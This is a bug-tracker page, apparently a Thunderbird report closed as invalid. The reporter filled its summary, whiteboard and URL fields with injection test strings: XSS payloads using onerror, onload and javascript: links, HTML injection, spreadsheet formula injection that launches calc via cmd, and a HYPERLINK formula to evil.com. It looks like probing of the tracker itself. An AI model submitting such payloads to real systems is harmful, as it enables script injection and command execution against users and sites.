Closed Bug 1568431 Opened 6 years ago Closed 6 years ago

<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>

Categories

(Invalid Bugs :: General, enhancement)

Product:
Invalid Bugs
Component:
General
Type:
enhancement
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED INVALID

People

(Reporter: what3verbugcrowd, Unassigned)

References

(
URL
)

Details

(Whiteboard: ":";-3+3+cmd|' /C calc'!D2)

Summary: ":";-3+3+cmd|' /C calc'!D2 → =1+1
Summary: =1+1 → ":";-3+3+cmd|' /C calc'!D2
URL: ":";-3+3+cmd|' /C calc'!D2
Summary: ":";-3+3+cmd|' /C calc'!D2 → =HYPERLINK("http://evil.com", "EVIL")
Whiteboard: ":";-3+3+cmd|' /C calc'!D2

=HYPERLINK("http://evil.com", "EVIL")

[{"insert":"\n"},{"insert":{"embed-external":{"data":{"type":"link","url":"http://localhost","name":"name","body":"body","photoUrl":"photourl'onerror=alert(1) '","timestamp":"time"onmouseover=alert(2) "","humanTime":"humentime"}}}}]

<img src=x onerror=alert(0);>

"><img src=x onerror="alert(document.domain)">

<svg><animate xlink:href=#x attributeName=href values=https://google.com /><a id=x><rect width=100 height=100 /></a>

<marquee behavior="scroll" direction="left">HTML_Injection</marquee>

Summary: =HYPERLINK("http://evil.com", "EVIL") → <svg/onload = alert(1);>
Summary: <svg/onload = alert(1);> → <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Component: Untriaged → General
Product: Thunderbird → Invalid Bugs
Resolution: --- → INVALID
Version: 5.0 → unspecified
You need to log in before you can comment on or make changes to this bug.